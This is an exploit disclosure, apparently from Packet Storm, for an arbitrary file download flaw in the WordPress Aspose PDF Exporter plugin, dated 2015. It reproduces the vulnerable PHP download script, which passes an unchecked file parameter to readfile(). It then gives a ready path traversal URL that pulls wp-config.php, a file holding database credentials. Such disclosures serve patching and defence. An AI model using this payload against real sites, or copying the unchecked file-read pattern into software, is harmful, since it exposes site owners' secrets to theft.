WordPress Aspose PDF Exporter plugin suffers from an arbitrary file download vulnerability.
1ffd4f7657e572760a2a7a2208b972d910c2e268df6c4f7fc9817750e8daf078Exploit Title : Wordpress Aaspose-pdf-exporter Plugin File Download
Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage: https://wordpress.org/plugins/aspose-pdf-exporter/
Download Link : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip
Date : 28 / 3 / 2015
Tested On : windows 8.1 + linux Kali
#########################################
#########################################
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>
Exploit: |
| [+] Vulnerable file :
http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>
Vulnerable Code :
<?php
$file = $_GET['file'];
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=[File
Address]
Examples :
http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
#########################################
#########################################
Discovered by : Rq07
#########################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed